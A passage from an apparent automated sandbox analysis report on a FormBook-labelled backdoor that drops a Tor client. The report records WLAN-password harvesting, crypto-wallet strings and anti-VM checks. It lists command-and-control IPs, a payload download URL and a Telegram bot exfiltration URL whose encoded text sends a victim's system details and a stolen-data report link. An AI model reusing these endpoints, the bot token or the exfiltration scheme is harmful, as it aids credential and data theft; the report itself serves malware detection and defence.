done to detect virtual machines) 64->145 147 Machine Learning detection for dropped file 64->147 149 5 other signatures 64->149 77 tor-real.exe 64->77         started        81 cmd.exe 64->81         started        83 powershell.exe 64->83         started        85 cmd.exe 64->85         started        file18 signatures19 process20 dnsIp21 137 72.132.134.217, 443, 49723 TWC-20001-PACWESTUS United States 77->137 139 51.158.147.144, 443, 49722 OnlineSASFR France 77->139 141 4 other IPs or domains 77->141 191 Found many strings related to Crypto-Wallets (likely being stolen) 77->191 193 Found Tor onion address 77->193 195 May use the Tor software to hide its network traffic 77->195 87 conhost.exe 77->87         started        197 Tries to harvest and steal WLAN passwords 81->197 89 conhost.exe 81->89         started        91 chcp.com 81->91         started        93 netsh.exe 81->93         started        95 findstr.exe 81->95         started        199 Loading BitLocker PowerShell Module 83->199 97 conhost.exe 83->97         started        99 conhost.exe 85->99         started        101 chcp.com 85->101         started        103 2 other processes 85->103 signatures22 process23

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                yt7dW9nyJK.exe42%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                yt7dW9nyJK.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Starlabs\ffmaba.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll0%ReversingLabs
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dll0%ReversingLabs
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dll0%ReversingLabs
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libgcc_s_sjlj-1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssl-1_1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libssp-0.dll0%ReversingLabs
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\libwinpthread-1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exe0%ReversingLabs
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe0%ReversingLabs
                C:\Users\user\AppData\Local\77rh3rhsc7\tor\zlib1.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Starlabs\ffmaba.exe46%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                C:\Users\user\AppData\Local\Temp\ffmaba.exe46%ReversingLabsByteCode-MSIL.Backdoor.FormBook

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://crl.microsoft0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://ip-api.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                http://crl.micro0%URL Reputationsafe
                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                https://support.mozilla.org0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                https://192.99.196.191:4430%Avira URL Cloudsafe
                http://156.245.141.24:80800%Avira URL Cloudsafe
                https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s0%Avira URL Cloudsafe
                https://www.torproject.org/0%Avira URL Cloudsafe
                https://138.2.92.67:4430%Avira URL Cloudsafe
                https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                http://185.119.118.59:80800%Avira URL Cloudsafe
                https://101.126.19.171:4430%Avira URL Cloudsafe
                https://api.telegram.org/bot0%Avira URL Cloudsafe
                http://47.88.59.12:800%Avira URL Cloudsafe
                http://185.119.118.59:8080/get0%Avira URL Cloudsafe
                http://ip-api.com/line?fields=query,country0%Avira URL Cloudsafe
                https://libyaalahrar.co/uploaded/JxTcJM84e3NbGP4mm.exe0%Avira URL Cloudsafe
                http://156.245.141.8:80800%Avira URL Cloudsafe
                http://121.171.125.177:90000%Avira URL Cloudsafe
                http://129.151.109.160:80800%Avira URL Cloudsafe
                https://aka.ms/pscore6lBcq0%Avira URL Cloudsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                http://ip-api.com/line?fields=query0%Avira URL Cloudsafe
                http://212.233.122.65:80000%Avira URL Cloudsafe
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                securefirewall.portmap.io0%Avira URL Cloudsafe
                http://216.39.242.18:80800%Avira URL Cloudsafe
                https://blog.torproject.org/v2-deprecation-timeline0%Avira URL Cloudsafe
                https://blog.torproject.org/v2-deprecation-timelineCalled0%Avira URL Cloudsafe
                http://127.0.0.1:0%Avira URL Cloudsafe
                http://185.119.118.59:8080/%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%0%Avira URL Cloudsafe
                https://blog.torproject.org/blog/lifecycle-of-a-new-relayCan0%Avira URL Cloudsafe
                http://127.0.0.1:2789/0%Avira URL Cloudsafe
                http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_user0%Avira URL Cloudsafe
                https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=687830%Avira URL Cloudsafe
                http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_user0%Avira URL Cloudsafe
                http://185.119.118.59:8080t-cq0%Avira URL Cloudsafe
                https://www.torproject.org/download/download#warning0%Avira URL Cloudsafe
                http://api.telegram.org0%Avira URL Cloudsafe
                http://crl.microfZ0%Avira URL Cloudsafe
                http://194.114.131.47:80800%Avira URL Cloudsafe
                https://api.telegram.org0%Avira URL Cloudsafe
                https://github.com0%Avira URL Cloudsafe
                http://185.217.98.121:800%Avira URL Cloudsafe
                http://156.245.142.3:80800%Avira URL Cloudsafe
                https://bugs.torproject.org/tpo/core/tor/14917.0%Avira URL Cloudsafe
                http://156.245.143.25:80800%Avira URL Cloudsafe
                https://44.228.161.50:4430%Avira URL Cloudsafe
                http://156.245.148.3:80800%Avira URL Cloudsafe
                http://47.110.140.182:80800%Avira URL Cloudsafe
                http://127.0.0.1:2789/pData0%Avira URL Cloudsafe
                http://156.245.146.28:80800%Avira URL Cloudsafe
                http://156.245.146.30:80800%Avira URL Cloudsafe
                https://www.torproject.org/documentation.html0%Avira URL Cloudsafe
                http://156.245.143.23:80800%Avira URL Cloudsafe
                http://156.245.144.19:80800%Avira URL Cloudsafe
                http://47.96.78.224:80800%Avira URL Cloudsafe
                https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb90%Avira URL Cloudsafe
                https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROU0%Avira URL Cloudsafe
                http://185.119.118.59:8080/d0Ouaqizfz/iAAD9_user0%Avira URL Cloudsafe
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%2C%7B%22%74%65%78%74%22%3A%22%4F%70%65%6E%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%3A%31%38%37%37%32%2F%68%61%6E%64%6C%65%4F%70%65%6E%57%53%52%3F%72%3D%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%5D%5D%7D&parse_mode=HTML0%Avira URL Cloudsafe
                https://bugs.torproject.org/tpo/core/tor/21155.0%Avira URL Cloudsafe
                http://156.245.142.6:80800%Avira URL Cloudsafe
                http://149.88.44.159:800%Avira URL Cloudsafe
                https://185.217.98.121:4430%Avira URL Cloudsafe
                http://www.microsoft.0%Avira URL Cloudsafe
                http://101.126.19.171:800%Avira URL Cloudsafe
                https://objects.githubusercontent.com0%Avira URL Cloudsafe
                http://156.245.147.30:80800%Avira URL Cloudsafe
                http://mingw-w64.sourceforge.net/X0%Avira URL Cloudsafe
                https://www.torproject.org/download/download#warningalphabetaThis0%Avira URL Cloudsafe
                https://api.tele0%Avira URL Cloudsafe
                http://127.0.0.1:18772/handleOpenWSR?r=0%Avira URL Cloudsafe
                https://sabotage.net0%Avira URL Cloudsafe
                https://www.torproject.org/docs/faq.html#BestOSForRelay0%Avira URL Cloudsafe
                https://bugs.torproject.org/tpo/core/tor/8742.0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                libyaalahrar.co
                		199.188.200.89
                		truefalse
                  		unknown
                  github.com
                  		140.82.121.3
                  		truefalse
                    		unknown
                    securefirewall.portmap.io
                    		193.161.193.99
                    		truetrue
                      		unknown
                      ip-api.com
                      		208.95.112.1
                      		truetrue
                        		unknown
                        api.telegram.org
                        		149.154.167.220
                        		truetrue
                          		unknown
                          objects.githubusercontent.com
                          		185.199.108.133
                          		truefalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://ip-api.com/line?fields=query,countryfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://libyaalahrar.co/uploaded/JxTcJM84e3NbGP4mm.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            securefirewall.portmap.iotrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%2C%7B%22%74%65%78%74%22%3A%22%4F%70%65%6E%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%3A%31%38%37%37%32%2F%68%61%6E%64%6C%65%4F%70%65%6E%57%53%52%3F%72%3D%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%5D%5D%7D&parse_mode=HTMLfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.com/line/?fields=hostingfalse
                            • URL Reputation: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/ac/?q=ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://156.245.141.24:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://138.2.92.67:443ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%stor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/botffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.microsoftyt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005F15000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://185.119.118.59:8080ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.torproject.org/tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://192.99.196.191:443ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://101.126.19.171:443ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2111386860.0000000005DBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://156.245.141.8:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.comffmaba.exe, 00000013.00000002.4510696537.0000000002EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameyt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2106330524.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004841000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.000000000280B000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BCB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://185.119.118.59:8080/getffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://129.151.109.160:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://47.88.59.12:80ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.2106330524.0000000004EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://aka.ms/pscore6lBcqpowershell.exe, 00000006.00000002.2106330524.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004841000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://121.171.125.177:9000ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.com/line?fields=queryffmaba.exe, 00000013.00000002.4510696537.0000000002EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.ecosia.org/newtab/ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://blog.torproject.org/v2-deprecation-timelineCalledtor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://212.233.122.65:8000ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://216.39.242.18:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://127.0.0.1:ffmaba.exe, 00000013.00000002.4510696537.0000000002E69000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://185.119.118.59:8080/%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%ffmaba.exe, 00000013.00000002.4510696537.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://blog.torproject.org/v2-deprecation-timelinetor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_userffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E65000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.microyt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2137223275.0000000002D14000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://blog.torproject.org/blog/lifecycle-of-a-new-relayCantor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=68783ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.2106330524.0000000004EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://127.0.0.1:2789/ffmaba.exe, 00000013.00000002.4510696537.0000000002E69000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.torproject.org/download/download#warningtor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_userffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E65000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://api.telegram.orgffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://185.119.118.59:8080t-cqffmaba.exe, 00000013.00000002.4510696537.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.microfZpowershell.exe, 00000006.00000002.2114974841.000000000777D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://194.114.131.47:8080ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://185.217.98.121:80ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.telegram.orgffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.comffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
